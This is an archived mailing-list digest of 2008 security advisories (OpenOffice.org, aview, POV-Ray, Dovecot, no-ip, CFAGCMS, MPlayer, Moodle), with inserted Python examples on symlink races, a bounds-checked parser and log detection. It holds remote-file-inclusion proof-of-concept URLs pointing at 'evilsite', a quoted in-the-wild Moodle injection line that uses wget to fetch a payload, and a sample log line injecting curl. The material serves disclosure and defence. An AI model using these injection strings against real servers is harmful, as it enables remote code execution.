[ GLSA 200812-13 ] OpenOffice.org: Multiple vulnerabilities

2008-12-15 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200812-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
   Title: OpenOffice.org: Multiple vulnerabilities
Date: December 12, 2008
Bugs: #235824, #244995
  ID: 200812-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities in OpenOffice.org might allow for
user-assisted execution of arbitrary code or symlink attacks.

Background
==

OpenOffice.org is an open source office productivity suite, including
word processing, spreadsheet, presentation, drawing, data charting,
formula editing, and file conversion facilities.

Affected packages
=

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  app-office/openoffice              < 3.0.0               >= 3.0.0
  2  app-office/openoffice-bin          < 3.0.0               >= 3.0.0
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===

Two heap-based buffer overflows when processing WMF files
(CVE-2008-2237) and EMF files (CVE-2008-2238) were discovered. Dmitry
E. Oboukhov also reported an insecure temporary file usage within the
senddoc script (CVE-2008-4937).

Impact
==

A remote attacker could entice a user to open a specially crafted
document, resulting in the remote execution of arbitrary code. A local
attacker could perform symlink attacks to overwrite arbitrary files on
the system. Both cases happen with the privileges of the user running
the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All OpenOffice.org users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose =app-office/openoffice-3.0.0

All OpenOffice.org binary users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose =app-office/openoffice-bin-3.0.0

References
==

[ 1 ] CVE-2008-2237
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2237
[ 2 ] CVE-2008-2238
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2238
[ 3 ] CVE-2008-4937
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4937

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200812-13.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




signature.asc
Description: OpenPGP digital signature


[ GLSA 200812-14 ] aview: Insecure temporary file usage

2008-12-15 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200812-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: aview: Insecure temporary file usage
  Date: December 14, 2008
  Bugs: #235808
ID: 200812-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An insecure temporary file usage has been reported in aview, leading to
symlink attacks.

Background
==

aview is an ASCII image viewer and animation player.

Affected packages
=

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  media-gfx/aview             < 1.3.0_rc1-r1         >= 1.3.0_rc1-r1

Description
===

Dmitry E. Oboukhov reported that aview uses the /tmp/aview$$.pgm file
in an insecure manner when processing files.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files on the system with the privileges of the user running the
application.
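The following Python program is an added example, not code from aview, OpenOffice.org or Gentoo. It reproduces the local symlink attack that both GLSA 200812-13 (the senddoc script) and GLSA 200812-14 (/tmp/aview$$.pgm) describe: a predictable name in a shared directory is pre-planted as a symlink by another local user, and the victim's write lands on the symlink target. It then shows the two fixes a practitioner reaches for, O_EXCL on a fixed name and tempfile.mkstemp() for a random one. The PID value, file names and directory are constructed for the demo.

```python
"""Predictable temp file vs. safe creation (added example, not from the GLSAs).

Models the bug class behind GLSA 200812-13 (senddoc) and 200812-14
(aview's /tmp/aview$$.pgm): a program writes to a guessable name in a
world-writable directory, and a local attacker who pre-plants a symlink
there gets the victim's data written over any file the victim can write.
"""
import os
import tempfile


def naive_write(tmpdir: str, pid: int, data: bytes) -> str:
    """Vulnerable pattern: open a predictable path for writing.

    open(..., "wb") is O_CREAT|O_TRUNC without O_EXCL, so if the path is
    already a symlink the kernel follows it and truncates the target.
    """
    path = os.path.join(tmpdir, f"aview{pid}.pgm")   # predictable: dir + pid
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def exclusive_create(path: str, data: bytes) -> bool:
    """For code that must keep a fixed name: O_EXCL refuses an existing entry.

    Returns True if the file was created, False if something (a symlink,
    an attacker's file) already occupied the name.
    """
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        return False
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return True


def safe_write(tmpdir: str, data: bytes) -> str:
    """Preferred pattern: random name, O_CREAT|O_EXCL, mode 0600 via mkstemp()."""
    fd, path = tempfile.mkstemp(prefix="aview", suffix=".pgm", dir=tmpdir)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Plant the symlink the way a local attacker would, then run each pattern."""
    with tempfile.TemporaryDirectory() as tmpdir:
        victim_file = os.path.join(tmpdir, "victim_data.txt")
        with open(victim_file, "wb") as fh:
            fh.write(b"important\n")

        pid = 4242                                   # attacker guesses or observes the PID
        trap = os.path.join(tmpdir, f"aview{pid}.pgm")
        os.symlink(victim_file, trap)                # attacker pre-plants the symlink

        naive_write(tmpdir, pid, b"P5 garbage\n")    # follows the symlink, overwrites victim
        with open(victim_file, "rb") as fh:
            naive_clobbered = fh.read() != b"important\n"

        with open(victim_file, "wb") as fh:          # reset the victim file
            fh.write(b"important\n")
        excl_created = exclusive_create(trap, b"P5 garbage\n")
        with open(victim_file, "rb") as fh:
            excl_clobbered = fh.read() != b"important\n"

        safe_path = safe_write(tmpdir, b"P5 garbage\n")
        safe_hit_trap = os.path.realpath(safe_path) == os.path.realpath(victim_file)

        return {
            "naive_clobbered": naive_clobbered,
            "excl_created": excl_created,
            "excl_clobbered": excl_clobbered,
            "safe_hit_trap": safe_hit_trap,
            "safe_mode_private": (os.stat(safe_path).st_mode & 0o077) == 0,
        }


if __name__ == "__main__":
    print(demo())
```

The shell equivalent of the `$$`-based name is exactly what aview did; mkstemp(1)/mkstemp(3) is the drop-in replacement in both shell scripts and C.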

Workaround
==

There is no known workaround at this time.

Resolution
==

All aview users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =media-gfx/aview-1.3.0_rc1-r1

References
==

  [ 1 ] CVE-2008-4935
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4935

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-14.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature


[SECURITY] [DSA 1686-1] New no-ip packages fix arbitrary code execution

2008-12-15 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1686-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
December 14, 2008 http://www.debian.org/security/faq
- 

Package: no-ip
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2008-5297
Debian Bug : 506179

A buffer overflow has been discovered in the HTTP parser of the No-IP.com
Dynamic DNS update client, which may result in the execution of arbitrary
code.

For the stable distribution (etch), this problem has been fixed in
version 2.1.1-4+etch1.

For the upcoming stable distribution (lenny) and the unstable distribution
(sid), this problem has been fixed in version 2.1.7-11.

We recommend that you upgrade your no-ip package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1.diff.gz
Size/MD5 checksum: 5099 991539fbaabc7808f1e6540e6d2a7d37
  http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1.orig.tar.gz
Size/MD5 checksum:70553 a743fcd40699596d25347083eca86d52
  http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1.dsc
Size/MD5 checksum:  573 a46cc0befc6409b256e76abceec2bba8

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_alpha.deb
Size/MD5 checksum:25552 72ada61d338c9ca7ccf22de55168de1b

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_amd64.deb
Size/MD5 checksum:22740 eea473fb4410d7b7953150139378b56c

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_arm.deb
Size/MD5 checksum:21486 eb86554f2e2b20c382810bcfce21ac96

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_hppa.deb
Size/MD5 checksum:23778 7212e0f6ef1b749de5531ff279fe63d1

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_i386.deb
Size/MD5 checksum:20838 44598c7737861f61e7c6f012c65228f7

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_ia64.deb
Size/MD5 checksum:30888 ba8e62cc6fe5bf70631710b699adb9da

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_mips.deb
Size/MD5 checksum:23936 f3d9215b718a083354e9b9426577aafb

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_mipsel.deb
Size/MD5 checksum:23854 69f6d783ff8345c565910877e2db4909

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_powerpc.deb
Size/MD5 checksum:22514 550fe870f5d0cb85e2ab96c510d70127

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_s390.deb
Size/MD5 checksum:22842 37f9132b2f6aae1a828405ae701a325c

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_sparc.deb
Size/MD5 checksum:21020 191248685382bb6051853bba9081f012


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAklFavwACgkQXm3vHE4uylr6PACfecCxr6ytpCw+L6lwdkRCO1E+
+osAoMrr6OmEO0SRfP5ViXSr4hglrye5
=H5rj
-END PGP SIGNATURE-



[ GLSA 200812-15 ] POV-Ray: User-assisted execution of arbitrary code

2008-12-15 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200812-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

   Severity: Normal
  Title: POV-Ray: User-assisted execution of arbitrary code
   Date: December 14, 2008
   Bugs: #153538
 ID: 200812-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


POV-Ray includes a version of libpng that might allow for the execution
of arbitrary code when reading a specially crafted PNG file.

Background
==

POV-Ray is a well known open-source ray tracer.

Affected packages
=

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  media-gfx/povray                 < 3.6.1-r4            >= 3.6.1-r4

Description
===

POV-Ray uses a statically linked copy of libpng to view and output PNG
files. The version shipped with POV-Ray is vulnerable to CVE-2008-3964,
CVE-2008-1382, CVE-2006-3334, CVE-2006-0481, CVE-2004-0768. A bug in
POV-Ray's build system caused it to load the old version when your
installed copy of libpng was >=media-libs/libpng-1.2.10.

Impact
==

An attacker could entice a user to load a specially crafted PNG file as
a texture, resulting in the execution of arbitrary code with the
permissions of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All POV-Ray users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose =media-gfx/povray-3.6.1-r4

References
==

   [ 1 ] CVE-2004-0768
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0768
   [ 2 ] CVE-2006-0481
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0481
   [ 3 ] CVE-2006-3334
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334
   [ 4 ] CVE-2008-1382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1382
   [ 5 ] CVE-2008-3964
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3964

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

   http://security.gentoo.org/glsa/glsa-200812-15.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




signature.asc
Description: OpenPGP digital signature


[ GLSA 200812-16 ] Dovecot: Multiple vulnerabilities

2008-12-15 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200812-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Dovecot: Multiple vulnerabilities
  Date: December 14, 2008
  Bugs: #240409, #244962, #245316
ID: 200812-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities were found in the Dovecot mailserver.

Background
==

Dovecot is an IMAP and POP3 server written with security primarily in
mind.

Affected packages
=

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  net-mail/dovecot                 < 1.1.7-r1            >= 1.1.7-r1

Description
===

Several vulnerabilities were found in Dovecot:

* The k right in the acl_plugin does not work as expected
  (CVE-2008-4577, CVE-2008-4578)

* The dovecot.conf is world-readable, providing improper protection
  for the ssl_key_password setting (CVE-2008-4870)

* A permanent Denial of Service with broken mail headers is possible
  (CVE-2008-4907)

Impact
==

These vulnerabilities might allow a remote attacker to cause a Denial
of Service, to circumvent security restrictions or allow local
attackers to disclose the passphrase of the SSL private key.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Dovecot users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-mail/dovecot-1.1.7-r1

Users should be aware that dovecot.conf will still be world-readable
after the update. If employing ssl_key_password, it should not be set
in dovecot.conf but in a separate file, readable only by root, that is
pulled in with include_try.

References
==

  [ 1 ] CVE-2008-4577
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577
  [ 2 ] CVE-2008-4578
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4578
  [ 3 ] CVE-2008-4870
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4870
  [ 4 ] CVE-2008-4907
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4907

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature


CFAGCMS Remote File Inclusion

2008-12-15 Thread admin

## www.BugReport.ir #
#
#  AmnPardaz Security Research Team
#
# Title: CFAGCMS Remote File Inclusion
# Vendor: http://sourceforge.net/projects/cfagcms/
# Bug: Remote File Inclusion
# Vulnerable Version: 1
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_58.htm
###



- Description:


CFAGCMS is a gaming CMS for gaming websites like GameSpot, GameSpy and
others. It is written in PHP and uses MySQL.



- Vulnerability:


+-- File Inclusion

When register_globals is enabled, it is possible to include arbitrary
files from local or remote resources.



- Code Snippet:

themes/default/index.php #line:14-17

<div id="twocols" class="clearfix">
<div id="maincol">maincol<?php include($main);?></div>
<div id="rightcol">right col<?php include($right);?></div>
</div>


- Exploits/POCs:


POC: http://[URL]/cfagcms/themes/default/index.php?main=http://evilsite
POC: http://[URL]/cfagcms/themes/default/index.php?right=http://evilsite


- Credit :

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com



[TKADV2008-014] MPlayer TwinVQ Processing Stack Buffer Overflow Vulnerability

2008-12-15 Thread Tobias Klein

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-014.txt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Advisory:   MPlayer TwinVQ Processing Stack Buffer Overflow 
Vulnerability
Advisory ID:TKADV2008-014
Revision:   1.0  
Release Date:   2008/12/14 
Last Modified:  2008/12/14
Date Reported:  2008/12/07
Author: Tobias Klein (tk at trapkit.de)
Affected Software:  MPlayer 1.0rc2 < r28150 and 
MPlayer SVN trunk < r28149
Remotely Exploitable:   Yes
Locally Exploitable:No 
Vendor URL: http://www.mplayerhq.hu 
Vendor Status:  Vendor has released an updated version
Patch development time: 8 days


==
Vulnerability Details: 
==

MPlayer contains a stack buffer overflow vulnerability while parsing 
malformed TwinVQ media files. The vulnerability may be exploited by a 
(remote) attacker to execute arbitrary code in the context of MPlayer.


==
Technical Details:
==

Source code file: libmpdemux\demux_vqf.c

[...]
24 static demuxer_t* demux_open_vqf(demuxer_t* demuxer) {
...
49   char chunk_id[4];
50   unsigned chunk_size;
51 [1]   hi->size=chunk_size=stream_read_dword(s); /* include itself */
52   stream_read(s,chunk_id,4);
53   if(*((uint32_t *)&chunk_id[0])==mmioFOURCC('C','O','M','M'))
54   {
55 [2]   char buf[chunk_size-8];
56       unsigned i,subchunk_size;
57 [3]   if(stream_read(s,buf,chunk_size-8)!=chunk_size-8) return NULL;
...
86       i+=subchunk_size+4;
87       while(i<chunk_size-8)
88       {
89         unsigned slen,sid;
90 [4]     char sdata[chunk_size];
91         sid=*((uint32_t *)&buf[i]); i+=4;
92 [5]     slen=be2me_32(*((uint32_t *)&buf[i])); i+=4;
93         if(sid==mmioFOURCC('D','S','I','Z'))
94         {
95           hi->Dsiz=be2me_32(*((uint32_t *)&buf[i]));
96           continue; /* describes the same info as size of DATA chunk */
97         }
98 [6]     memcpy(sdata,&buf[i],slen); sdata[slen]=0; i+=slen;
[...]

[1] The unsigned int variable chunk_size is filled with a user controlled
value from the media file.
[2] The value of chunk_size is used to calculate the length of the stack 
buffer buf.
[3] buf is filled with user controlled data from the media file.
[4] The value of chunk_size is again used as a length specifier for 
another stack buffer called sdata.
[5] The unsigned int variable slen is filled with a user controlled value
from the media file.
[6] This memcpy() call copies slen bytes of user controlled data from
buf into the stack buffer sdata. As slen, the source data and the size
of the destination buffer sdata are all user controlled, this leads to
an exploitable stack buffer overflow.
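As an added example, not MPlayer's code, the following Python parser implements the checks the excerpt above lacks, over the chunk layout the excerpt shows: a 32-bit size that counts itself and the 4-byte id, the id COMM, then sub-chunks made of a 4-byte id, a big-endian 32-bit length and that many bytes of data. Two things are assumptions rather than facts from the advisory: that the outer size is big-endian like the inner lengths, and the MAX_CHUNK_SIZE cap, which is a sanity bound chosen here and not a value from the TwinVQ specification. The sample chunks are constructed for the demo.

```python
"""Bounds-checked parser for the TwinVQ COMM chunk layout in TKADV2008-014
(added example, not MPlayer's code). Numbered comments refer to the
advisory's [1]..[6] markers."""
import struct

MAX_CHUNK_SIZE = 1 << 20  # assumption: a sane upper bound, not from the TwinVQ spec


class MalformedChunk(ValueError):
    """Raised wherever the original code would have trusted a bad length."""


def parse_comm_chunk(data: bytes) -> dict:
    """Parse one COMM chunk; returns {'dsiz': int|None, 'subchunks': {id: bytes}}."""
    if len(data) < 8:
        raise MalformedChunk("truncated chunk header")
    chunk_size, chunk_id = struct.unpack(">I4s", data[:8])      # [1] attacker controlled
    if chunk_id != b"COMM":
        raise MalformedChunk("not a COMM chunk")
    # [2] chunk_size-8 underflows for chunk_size<8, and a huge value exhausts the stack
    if chunk_size < 8 or chunk_size > MAX_CHUNK_SIZE:
        raise MalformedChunk(f"implausible chunk_size {chunk_size}")
    payload = data[8:chunk_size]
    if len(payload) != chunk_size - 8:                           # [3] short read
        raise MalformedChunk("chunk body shorter than declared")

    result = {"dsiz": None, "subchunks": {}}
    i = 0
    while i < len(payload):                                      # the loop at line 87
        if len(payload) - i < 8:
            raise MalformedChunk("truncated sub-chunk header")
        sid = payload[i:i + 4]
        slen = struct.unpack(">I", payload[i + 4:i + 8])[0]      # [5] attacker controlled
        i += 8
        if slen > len(payload) - i:                              # [6] the missing check
            raise MalformedChunk(
                f"sub-chunk {sid!r} claims {slen} bytes, {len(payload) - i} remain")
        sdata = payload[i:i + slen]
        i += slen
        if sid == b"DSIZ":
            if slen != 4:
                raise MalformedChunk("DSIZ payload must be 4 bytes")
            result["dsiz"] = struct.unpack(">I", sdata)[0]
        else:
            result["subchunks"][sid.decode("ascii", "replace")] = sdata
    return result


def build_comm_chunk(subchunks, declared_size=None) -> bytes:
    """Construct a COMM chunk for tests; declared_size lets a test lie about the size."""
    body = b"".join(sid + struct.pack(">I", len(d)) + d for sid, d in subchunks)
    size = 8 + len(body) if declared_size is None else declared_size
    return struct.pack(">I", size) + b"COMM" + body


# Constructed sample inputs (not captured from real TwinVQ files).
GOOD_CHUNK = build_comm_chunk([(b"NAME", b"MPlayer"), (b"DSIZ", struct.pack(">I", 1234))])
# Sub-chunk claims 0xFFFFFFF0 bytes but only 4 follow: the memcpy() overflow at [6].
OVERFLOW_CHUNK = (struct.pack(">I", 8 + 12) + b"COMM"
                  + b"NAME" + struct.pack(">I", 0xFFFFFFF0) + b"AAAA")
# chunk_size below 8: chunk_size-8 wraps to ~4 GiB for the VLA at [2].
UNDERFLOW_CHUNK = struct.pack(">I", 4) + b"COMM"


def classify(chunk: bytes) -> str:
    """Return 'ok' or the rejection reason; convenient for a fuzzing harness."""
    try:
        parse_comm_chunk(chunk)
        return "ok"
    except MalformedChunk as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    for name, chunk in [("good", GOOD_CHUNK), ("overflow", OVERFLOW_CHUNK),
                        ("underflow", UNDERFLOW_CHUNK)]:
        print(name, classify(chunk))
```

The same three checks (size floor, size ceiling, per-element length against bytes remaining) are what a C fix needs; in C the VLA sizes at [2] and [4] should additionally become fixed-size buffers or heap allocations checked against the same bound.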


= 
Solution: 
=

  Upgrade to MPlayer 1.0rc2 >= r28150 (see [1]) or MPlayer SVN trunk 
  >= r28149 (see [2]).


 
History: 


  2008/12/07 - MPlayer maintainers notified (no response)
  2008/12/13 - MPlayer maintainers notified a 2nd time 
  2008/12/13 - Patch developed by MPlayer maintainers
  2008/12/14 - Public disclosure of vulnerability details by MPlayer 
   maintainers
  2008/12/14 - Release date of this security advisory


 
Credits: 


  Vulnerability found and advisory written by Tobias Klein.


=== 
References: 
===

 [1] http://svn.mplayerhq.hu/mplayer?view=rev&revision=28150
 [2] http://svn.mplayerhq.hu/mplayer?view=rev&revision=28149
 [3] http://www.trapkit.de/advisories/TKADV2008-014.txt


 
Changes: 


  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Public release


===
Disclaimer:
===

The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.


== 
PGP Signature Key: 
==

  http://www.trapkit.de/advisories/tk-advisories-signature-key.asc

  
Copyright 2008 Tobias Klein. All rights reserved.

-BEGIN PGP SIGNATURE-
Version: GnuPG

iD8DBQFJRTPgkXxgcAIbhEERAozRAJ99w8+Fd/tpkrFK6iWULTNsrUFPCQCgscV3
bq82SPZiJ7lWooDSZUW7en4=
=6hrU
-END PGP SIGNATURE-


Re: Moodle 1.9.3 Remote Code Execution

2008-12-15 Thread lent
Exploit in the wild:

We saw this come across:

216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] GET 
/filter/tex/texed.php?formdata=foo&pathname=foo\;wget -O 
perso.wanadoo.es/medline/z1.php;echo+\ HTTP/1.1 404 218


The host perso.wanadoo.es is still hosting the payload as of [15/Dec/2008:00:14:00 
-0500].

Chris Lent
Tel: +1.212.353.4350
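Added example, not from the thread: a detector written for this page that scans Apache combined-format access-log lines for the texed.php injection pattern quoted above. It URL-decodes the query string and flags a hit when pathname or formdata carries a download command, or when pathname contains anything a plain filename never needs. The log lines are constructed; the first is adapted from the line quoted in the post (with the & between parameters restored and the request line quoted as Apache writes it), the rest are invented benign and malicious requests.

```python
"""Detect Moodle /filter/tex/texed.php command-injection attempts in Apache
combined-format logs (added example, not from the thread)."""
import re
from collections import namedtuple
from urllib.parse import parse_qs, urlsplit

Hit = namedtuple("Hit", "ip ts status reason")

# Request target is matched non-greedily up to the protocol token because the
# injected command contains literal spaces, which would break a \S+ match.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) (?P<proto>HTTP/\d\.\d)" (?P<status>\d{3}) (?P<size>\S+)'
)
DOWNLOADER = re.compile(r"\b(wget|curl|fetch|lwp-download)\b", re.IGNORECASE)
# pathname should be a simple generated filename; formdata is LaTeX and may
# legitimately contain ';' (e.g. the \; thin space), so it only gets the
# downloader check to avoid false positives.
SAFE_PATHNAME = re.compile(r"^[A-Za-z0-9._/-]*$")


def inspect_line(line: str):
    """Return a Hit for a suspicious texed.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.endswith("/filter/tex/texed.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)   # parse_qs URL-decodes values
    status = int(m["status"])
    for name in ("pathname", "formdata"):
        for value in params.get(name, []):
            if DOWNLOADER.search(value):
                return Hit(m["ip"], m["ts"], status, f"{name} carries a download command: {value!r}")
    for value in params.get("pathname", []):
        if not SAFE_PATHNAME.match(value):
            return Hit(m["ip"], m["ts"], status, f"pathname has non-filename characters: {value!r}")
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the hits."""
    return [hit for hit in map(inspect_line, lines) if hit is not None]


# Constructed sample log; line 1 is adapted from the thread, the others are invented.
SAMPLE_LOG = [
    r'216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET /filter/tex/texed.php?formdata=foo&pathname=foo\;wget -O perso.wanadoo.es/medline/z1.php;echo+\ HTTP/1.1" 404 218',
    r'10.0.0.5 - - [12/Dec/2008:15:10:00 -0500] "GET /filter/tex/texed.php?formdata=%5Cfrac%7Ba%7D%7Bb%7D%5C%3B&pathname=abc123.gif HTTP/1.1" 200 1482',
    r'10.0.0.6 - - [12/Dec/2008:15:11:30 -0500] "GET /course/view.php?id=2 HTTP/1.1" 200 9000',
    r'203.0.113.9 - - [12/Dec/2008:16:02:41 -0500] "GET /moodle/filter/tex/texed.php?formdata=x&pathname=x%60curl%20evil%2Fa.sh%60 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

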